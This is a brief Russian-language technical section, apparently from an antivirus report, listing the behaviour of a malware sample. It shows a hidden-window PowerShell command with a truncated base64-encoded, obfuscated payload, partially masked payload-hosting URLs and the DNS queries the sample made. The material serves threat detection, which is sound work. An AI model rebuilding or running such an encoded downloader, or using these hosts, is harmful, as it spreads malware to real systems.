Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHMAOQBrAHcAdgBoAD0AJwBYAGUANQB5ADkAdABqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAGMAVQByAGkAdAB5AHAAcgBPAGAAVABPAEMAYABPAEwAIgAgAD0AIAAnAH...
- http://du####e-partner.com/wp-content/h7_t5l_xkezzpi/
- http://ne####metsterren.nl/wp-admin/tc_8o8_fw6/
- http://gh.###pyy120.com/phpmyadmin/h_1u_ta2d6cpl/
- DNS ASK co#######ion.maitriinfosoft.com
- DNS ASK to##o.net
- DNS ASK du####e-partner.com
- DNS ASK bi#.ly
- DNS ASK ne####metsterren.nl
- DNS ASK gh.###pyy120.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHMAOQBrAHcAdgBoAD0AJwBYAGUANQB5ADkAdABqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAGMAVQByAGkAdAB5AHAAcgBPAGAAVABPAEMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)